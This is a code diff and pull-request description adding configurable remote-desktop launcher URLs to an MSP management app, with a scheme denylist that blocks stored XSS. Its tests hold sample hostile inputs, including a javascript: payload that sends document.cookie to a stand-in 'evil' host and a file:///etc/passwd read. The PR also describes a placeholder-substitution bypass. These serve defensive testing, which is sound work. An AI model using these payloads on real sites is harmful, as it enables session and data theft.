   { key: 'aiBudgets', label: 'AI Budgets' },
+  { key: 'remoteAccess', label: 'Remote' },
 ];
 
 const TIMEZONES = [
@@ -115,6 +118,7 @@ export default function PartnerSettingsPage() {
   const [defaultsData, setDefaultsData] = useState<InheritableDefaultSettings>({});
   const [brandingData, setBrandingData] = useState<InheritableBrandingSettings>({});
   const [aiBudgetsData, setAiBudgetsData] = useState<InheritableAiBudgetSettings>({});
+  const [remoteAccessData, setRemoteAccessData] = useState<InheritableRemoteAccessSettings>({});
 
   const fetchPartner = useCallback(async () => {
     try {
@@ -151,6 +155,7 @@ export default function PartnerSettingsPage() {
       setDefaultsData(settings.defaults || {});
       setBrandingData(settings.branding || {});
       setAiBudgetsData(settings.aiBudgets || {});
+      setRemoteAccessData(settings.remoteAccessProviders || {});
     } catch (err) {
       setError(err instanceof Error ? err.message : 'An error occurred');
     } finally {
@@ -213,6 +218,7 @@ export default function PartnerSettingsPage() {
       settings.defaults = defaultsData;
       settings.branding = brandingData;
       settings.aiBudgets = aiBudgetsData;
+      settings.remoteAccessProviders = remoteAccessData;
 
       const payload: Record<string, unknown> = { settings };
       const trimmedName = companyName.trim();
@@ -490,6 +496,12 @@ export default function PartnerSettingsPage() {
       {activeTab === 'aiBudgets' && (
         <section className="rounded-lg border bg-card p-6 shadow-sm">
           <PartnerAiBudgetsTab data={aiBudgetsData} onChange={setAiBudgetsData} />
+        </section>
+      )}
+
+      {activeTab === 'remoteAccess' && (
+        <section className="rounded-lg border bg-card p-6 shadow-sm">
+          <PartnerRemoteAccessTab data={remoteAccessData} onChange={setRemoteAccessData} />
         </section>
       )}
     </div>

--- a/packages/shared/src/types/index.ts
+++ b/packages/shared/src/types/index.ts
@@ -546,6 +546,36 @@ export interface InheritableAiBudgetSettings {
   approvalMode?: 'per_step' | 'action_plan' | 'auto_approve' | 'hybrid_plan';
 }
 
+// A pluggable remote-desktop launcher (e.g. RustDesk, ScreenConnect, TeamViewer).
+// The Connect Desktop button on the device detail page consults the partner's
+// configured providers and, when a default is set, builds a launch URL by
+// substituting `{id}` (device.custom_fields[customFieldKey]) and `{password}`
+// placeholders into urlTemplate. URL building happens server-side so the
+// password never ships to the browser unless the user is launching a session.
+//
+// Examples of urlTemplate:
+//   'rustdesk://{id}?password={password}'
+//     — custom protocol handler hand-off (RustDesk, TeamViewer desktop, AnyDesk)
+//   'https://acme.screenconnect.com/Host#Access///{id}/Join'
+//     — HTTPS launcher; the button opens it in a new browser tab
+//
+// The browser button auto-detects the launch mode by URL prefix: anything
+// starting with http(s):// opens in a new tab; anything else is handed to the
+// OS as a custom-scheme deep link.
+export interface RemoteAccessProvider {
+  id: string;
+  name: string;
+  urlTemplate: string;
+  customFieldKey: string;
+  password?: string;
+  enabled: boolean;
+}
+
+export interface InheritableRemoteAccessSettings {
+  providers?: RemoteAccessProvider[];
+  defaultProviderId?: string;
+}
+
 export interface EffectiveOrgSettings {
   security?: InheritableSecuritySettings;
   notifications?: InheritableNotificationSettings;
@@ -553,6 +583,7 @@ export interface EffectiveOrgSettings {
   defaults?: InheritableDefaultSettings;
   branding?: InheritableBrandingSettings;
   aiBudgets?: InheritableAiBudgetSettings;
+  remoteAccessProviders?: InheritableRemoteAccessSettings;
   locked: string[];
 }
 
@@ -590,6 +621,7 @@ export interface PartnerSettings {
   // returns matching orgs in this order; orgs not present in the array
   // (newly created or stale entries) are appended in createdAt order.
   organizationOrder?: string[];
+  remoteAccessProviders?: InheritableRemoteAccessSettings;
 }
 
 // ============================================

--- a/packages/shared/src/validators/index.ts
+++ b/packages/shared/src/validators/index.ts
@@ -13,6 +13,7 @@ import {
 
 export * from './reliability';
 export * from './businessEmail';
+export * from './remoteAccessLauncherScheme';
 
 // ============================================
 // Device Roles

--- a/packages/shared/src/validators/remoteAccessLauncherScheme.test.ts
+++ b/packages/shared/src/validators/remoteAccessLauncherScheme.test.ts
@@ -1,0 +1,41 @@
+import { describe, it, expect } from 'vitest';
+import { isAllowedLauncherScheme } from './remoteAccessLauncherScheme';
+
+describe('isAllowedLauncherScheme', () => {
+  it('accepts known-safe remote-access schemes', () => {
+    expect(isAllowedLauncherScheme('rustdesk://{id}?password={password}')).toBe(true);
+    expect(isAllowedLauncherScheme('teamviewer://{id}')).toBe(true);
+    expect(isAllowedLauncherScheme('anydesk://{id}')).toBe(true);
+    expect(isAllowedLauncherScheme('splashtop://{id}')).toBe(true);
+    expect(isAllowedLauncherScheme('https://acme.example.com/Host#Access///{id}/Join')).toBe(true);
+    expect(isAllowedLauncherScheme('http://127.0.0.1:42/{id}')).toBe(true);
+    expect(isAllowedLauncherScheme('breeze://connect?id={id}')).toBe(true);
+    expect(isAllowedLauncherScheme('bdunn-rustremote://{id}')).toBe(true);
+  });
+
+  it('rejects javascript: in any case (stored XSS via partner-admin)', () => {
+    expect(isAllowedLauncherScheme('javascript:alert(1)')).toBe(false);
+    expect(isAllowedLauncherScheme('JavaScript:alert(1)')).toBe(false);
+    expect(isAllowedLauncherScheme('JAVASCRIPT:alert(1)')).toBe(false);
+    expect(isAllowedLauncherScheme('javascript:fetch("//evil/?c="+document.cookie+"_{id}")')).toBe(false);
+  });
+
+  it('rejects other dangerous schemes', () => {
+    expect(isAllowedLauncherScheme('data:text/html,<script>alert(1)</script>')).toBe(false);
+    expect(isAllowedLauncherScheme('vbscript:msgbox(1)')).toBe(false);
+    expect(isAllowedLauncherScheme('file:///etc/passwd')).toBe(false);
+    expect(isAllowedLauncherScheme('about:blank')).toBe(false);
+    expect(isAllowedLauncherScheme('chrome://settings')).toBe(false);
+    expect(isAllowedLauncherScheme('jar:file:///foo!/bar')).toBe(false);
+    expect(isAllowedLauncherScheme('blob:https://x/abc')).toBe(false);
+    expect(isAllowedLauncherScheme('view-source:https://x')).toBe(false);
+    expect(isAllowedLauncherScheme('filesystem:https://x/foo')).toBe(false);
+  });
+
+  it('rejects strings with no scheme', () => {
+    expect(isAllowedLauncherScheme('')).toBe(false);
+    expect(isAllowedLauncherScheme('//acme.example.com/{id}')).toBe(false);
+    expect(isAllowedLauncherScheme('{id}')).toBe(false);
+    expect(isAllowedLauncherScheme('rustdesk{id}')).toBe(false);
+  });
+});

--- a/packages/shared/src/validators/remoteAccessLauncherScheme.ts
+++ b/packages/shared/src/validators/remoteAccessLauncherScheme.ts
@@ -1,0 +1,24 @@
+// Shared scheme-safety check for remote-access launcher URL templates.
+//
+// The launcher fires the resulting URL via either an anchor click (custom
+// schemes like rustdesk://) or window.open(...) (https). Both vectors will
+// execute javascript: and (in some browsers) data: / vbscript: / file:
+// payloads in the partner's own origin if a malicious partner admin sets a
+// crafted urlTemplate. We block those at validation time AND on the client
+// before firing, since one source of truth on a sensitive guard like this
+// is brittle.
+
+const DISALLOWED_SCHEMES: ReadonlySet<string> = new Set([
+  'javascript', 'data', 'vbscript', 'file', 'about', 'chrome', 'jar', 'blob',
+  'view-source', 'filesystem',
+]);
+
+const SCHEME_PATTERN = /^([a-zA-Z][a-zA-Z0-9+.\-]*):/;
+
+export function isAllowedLauncherScheme(urlOrTemplate: string): boolean {
+  const m = urlOrTemplate.match(SCHEME_PATTERN);
+  if (!m) return false;
+  const scheme = m[1]?.toLowerCase();
+  if (!scheme) return false;
+  return !DISALLOWED_SCHEMES.has(scheme);
+}


### PR DESCRIPTION

## Summary

- Adds a per-Partner setting (`PartnerSettings.remoteAccessProviders`) that lets MSPs configure which remote-desktop tool the Connect Desktop button hands off to. Templated launch URL with `{id}`/`{password}`/`{customFieldKey}` substitution, plus a built-in WebRTC fallback when no template applies.
- New `PartnerRemoteAccessTab` UI with CRUD over providers, password show/hide, and a permanent built-in default that cannot be deleted.
- Defense-in-depth XSS hardening: shared `isAllowedLauncherScheme` validator (denies `javascript:`, `data:`, `vbscript:`, `file:`, `about:`, `chrome:`, `jar:`, `blob:`, `view-source:`, `filesystem:`), enforced at template-write time, at URL-build time post-substitution, and again at click time in the browser. Closes the stored-XSS vector that earlier `^[a-z]+:` scheme-presence checks left open.
- Live-tested end-to-end with RustDesk and ScreenConnect (with and without JoinOptions for backstage).

Closes-discussion: #610.

## Type of Change

- [x] New feature

## Testing

- [x] Existing tests pass (`pnpm test`)
- [x] Added new tests
- [x] Manual testing (described below)

Test coverage:
- `packages/shared/src/validators/remoteAccessLauncherScheme.test.ts`: 4 new unit tests covering allow-list, case-insensitive `javascript:` rejection, every denylist entry, and the no-scheme case.
- `apps/api/src/services/remoteAccessLauncher.test.ts`: 10-case Vitest coverage for placeholder substitution and percent-encoding.
- `apps/api/src/services/remoteAccessLauncher.test.ts`: dedicated test for the substitution-attack path (template `j{id}cript:foo` with id `avas` resolving to `javascript:foo`).
- Full `pnpm tsc --noEmit` clean on api + web + shared.

Manual: confirmed working live for both RustDesk (custom-scheme deep-link) and ScreenConnect (https with hash fragments for `/Host#Access///{id}/Join`), with and without JoinOptions for backstage entry. Connect Desktop button auto-detects launch mode by URL prefix.

## Checklist

- [x] My code follows the project's code style
- [x] I have reviewed my own changes
- [x] I have tested on the relevant platforms
- [x] No secrets, credentials, or personal data included

## What's in the PR (3 commits)

1. `Pluggable remote-desktop launcher (RustDesk/ScreenConnect/TeamViewer/...)`: schema in `PartnerSettings.remoteAccessProviders`, server-side URL builder under `withSystemDbAccessContext` so partner-row RLS doesn't strip the lookup when the request scope is org/partner, `GET /devices/:id` returns `remoteAccessLaunchUrl`, Zod refinement on the Partner Settings schema requiring `{id}` and a URL scheme, web `ConnectDesktopButton` that opens https URLs in a new tab and hands custom-scheme URLs to the OS protocol handler, new `PartnerRemoteAccessTab` UI.
2. `feat(api,web,shared): scheme denylist + length bounds for remote-access launcher (XSS hardening)`: closes a stored-XSS vector in the prior scheme-presence regex. Adds shared validator, enforces it in `orgs.ts` partner settings schema, re-checks in `ConnectDesktopButton.handleConnect`, and caps the providers array (max 50) plus per-string lengths (id/name/customFieldKey max 100, password max 2000).
3. `fix(api): reject substituted launcher URLs whose final scheme resolves to a denylist entry`: belt-and-suspenders. A template like `j{id}cript:foo` passes the template-time scheme check (literal prefix is `j`) but resolves to `javascript:foo` after substitution. `buildRemoteAccessLaunchUrl` now re-runs `isAllowedLauncherScheme` on the final URL before returning.

## Live-tested

Confirmed working live by partner admin with a real RustDesk install and a real ScreenConnect tenant on 2026-05-09. The Connect Desktop button on the device detail page successfully hands off to both deep-link (RustDesk) and https-tab (ScreenConnect with JoinOptions/backstage) modes.
